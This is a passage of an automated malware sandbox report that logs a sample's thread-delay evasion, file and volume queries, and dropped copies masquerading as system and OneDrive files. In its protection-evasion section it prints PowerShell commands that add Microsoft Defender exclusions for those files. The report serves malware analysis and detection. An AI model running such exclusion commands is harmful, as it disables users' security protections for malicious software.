                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 92 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 8156Thread sleep time: -30000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -31359464925306218s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -600000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599766s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599563s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599406s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599255s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599110s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598957s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598817s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598649s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6972Thread sleep time: -14400000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598469s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598321s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598202s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598090s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597979s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597851s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597422s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597063s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596922s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596781s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596668s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596538s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596360s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596188s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596047s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595937s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595818s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595662s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595500s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595352s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595078s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594500s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594292s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594172s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594051s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593922s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593813s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593697s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593594s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593482s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593375s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6972Thread sleep time: -300000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593266s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593155s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593037s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592884s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592779s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592672s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592563s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592453s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592338s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592188s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591672s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591533s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591406s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591297s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591188s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591078s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590967s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590847s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590719s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590609s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590500s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590388s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590268s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 1900Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 7640Thread sleep time: -30000s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 1460Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 5024Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6296Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 2488Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 2304Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 1284Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 2324Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 30000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599766
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599255
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599110
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598957
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598817
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598649
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 3600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598469
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598321
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598202
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598090
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597979
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597851
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597422
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597063
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596781
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596668
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596538
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596360
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596047
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595937
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595818
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595662
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595352
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594292
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594172
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594051
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593813
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593697
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593594
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593482
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593375
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 300000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593266
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593155
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593037
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592884
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592779
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592453
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592338
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591533
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591297
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590967
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590847
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590719
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590609
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590388
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590268
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"Jump to behavior
